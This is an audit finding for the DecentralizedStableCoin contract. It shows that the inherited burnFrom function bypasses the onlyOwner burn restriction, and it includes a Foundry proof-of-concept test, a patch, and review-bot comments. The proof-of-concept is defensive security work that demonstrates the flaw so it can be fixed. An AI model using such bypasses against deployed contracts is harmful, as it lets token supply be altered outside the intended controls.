15,000 USDC
Submission Details
Severity: medium
Valid

Anyone can burn **DecentralizedStableCoin** tokens with `burnFrom` function

Summary

Anyone holding an ERC-20 allowance on a DSC balance (including a holder who approves themselves) can burn DSC tokens through the `burnFrom` function that DecentralizedStableCoin inherits, unchanged, from OpenZeppelin's ERC20Burnable contract.

Vulnerability Details

In the DecentralizedStableCoin contract, `burn` is overridden with the `onlyOwner` modifier and is called by the DSCEngine contract, which is the owner of DecentralizedStableCoin. The contract also inherits OpenZeppelin's ERC20Burnable, whose `burnFrom(address account, uint256 amount)` is not overridden: it only spends the caller's allowance from `account` and then calls `_burn`, so it is not covered by the `onlyOwner` restriction. A DSC holder can therefore approve themselves (or any other address) and burn tokens directly, without going through DSCEngine.
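The following Foundry test reproduces the bypass. It is added here as an illustration and is not part of the original submission or the project's test suite; it assumes a forge-std project with the contract at `src/DecentralizedStableCoin.sol`, OpenZeppelin 4.x (the `Ownable` and `ERC20` revert strings), and uses a plain address as a stand-in for DSCEngine as owner.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

// Added proof-of-concept, not taken from the submission. Assumptions: Foundry with
// forge-std, the token at src/DecentralizedStableCoin.sol, OpenZeppelin 4.x revert
// strings, and an EOA ("engine") standing in for DSCEngine as the token owner.
import {Test} from "forge-std/Test.sol";
import {DecentralizedStableCoin} from "../src/DecentralizedStableCoin.sol";

contract BurnFromBypassTest is Test {
    DecentralizedStableCoin dsc;
    address engine = makeAddr("engine"); // stand-in for DSCEngine (owner)
    address alice = makeAddr("alice");   // ordinary DSC holder
    address bob = makeAddr("bob");       // third party with an allowance

    function setUp() public {
        dsc = new DecentralizedStableCoin();
        dsc.transferOwnership(engine);
        vm.prank(engine);
        dsc.mint(alice, 100 ether); // mint is onlyOwner, so the owner mints for alice
    }

    // The overridden burn() is owner-only: a plain holder cannot call it.
    function testBurnIsOwnerOnly() public {
        vm.prank(alice);
        vm.expectRevert(bytes("Ownable: caller is not the owner"));
        dsc.burn(10 ether);
    }

    // burnFrom() is inherited untouched: alice approves herself and burns without the owner.
    function testBurnFromBypassesOnlyOwner() public {
        vm.startPrank(alice);
        dsc.approve(alice, 10 ether);
        dsc.burnFrom(alice, 10 ether);
        vm.stopPrank();
        assertEq(dsc.balanceOf(alice), 90 ether);
        assertEq(dsc.totalSupply(), 90 ether);
    }

    // Any address that was granted an allowance can do the same on the holder's balance.
    function testThirdPartyWithAllowanceCanBurn() public {
        vm.prank(alice);
        dsc.approve(bob, 25 ether);
        vm.prank(bob);
        dsc.burnFrom(alice, 25 ether);
        assertEq(dsc.balanceOf(alice), 75 ether);
        assertEq(dsc.allowance(alice, bob), 0); // allowance is consumed, as in transferFrom
    }

    // Without an allowance burnFrom fails: the bypass is bounded by ERC-20 approvals,
    // not open to arbitrary callers against arbitrary balances.
    function testBurnFromWithoutAllowanceReverts() public {
        vm.prank(bob);
        vm.expectRevert(bytes("ERC20: insufficient allowance"));
        dsc.burnFrom(alice, 1 ether);
    }
}
```

Run with `forge test --match-contract BurnFromBypassTest`. After the recommended override of `burnFrom` is applied, the two `burnFrom` success cases should flip to reverting with the new custom error, which is the regression check to keep in the suite.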

Impact

DSC tokens can be burned through `burnFrom`, bypassing the `onlyOwner` modifier on `burn`. The burn is limited by the ERC-20 allowance model (the caller needs an allowance from the holder, which a holder can grant to themselves), but it lets DSC supply be reduced without DSCEngine, the intended sole caller of `burn`, being involved.

Recommendations

Override the `burnFrom` function inherited from OpenZeppelin's ERC20Burnable so that it always reverts, leaving the owner-only `burn` as the single burn path:

@@ -40,6 +40,7 @@ contract DecentralizedStableCoin is ERC20Burnable, Ownable {
error DecentralizedStableCoin__MustBeMoreThanZero();
error DecentralizedStableCoin__BurnAmountExceedsBalance();
error DecentralizedStableCoin__NotZeroAddress();
+ error DecentralizedStableCoin__BlockFunction();
constructor() ERC20("DecentralizedStableCoin", "DSC") {}
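Review bot: the error name at `+ error DecentralizedStableCoin__BlockFunction();` does not say which function is blocked or why; the existing errors in this list name the condition (`MustBeMoreThanZero`, `BurnAmountExceedsBalance`, `NotZeroAddress`), so a name such as `DecentralizedStableCoin__BurnFromDisabled()` would follow the same convention and make the revert reason self-explanatory in traces.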
@@ -54,6 +55,10 @@ contract DecentralizedStableCoin is ERC20Burnable, Ownable {
super.burn(_amount);
}
+ function burnFrom(address, uint256) public pure override {
+ revert DecentralizedStableCoin__BlockFunction();
+ }
+
function mint(address _to, uint256 _amount) external onlyOwner returns (bool) {
if (_to == address(0)) {
revert DecentralizedStableCoin__NotZeroAddress();
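Review bot: the override at `+ function burnFrom(address, uint256) public pure override {` reverts unconditionally, which is the intended block (and `pure` is a permitted tightening of the inherited non-payable mutability), but it carries no documentation; add a NatSpec `@notice` stating that burning is only possible through the owner-only `burn` path, and add a test that `burnFrom` reverts with `DecentralizedStableCoin__BlockFunction` even when the caller holds an allowance, since the allowance case is exactly the one the report describes. Note also that the owner-only `burn` at `super.burn(_amount);` is unchanged, so DSCEngine, which calls `burn`, is not affected by this override.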
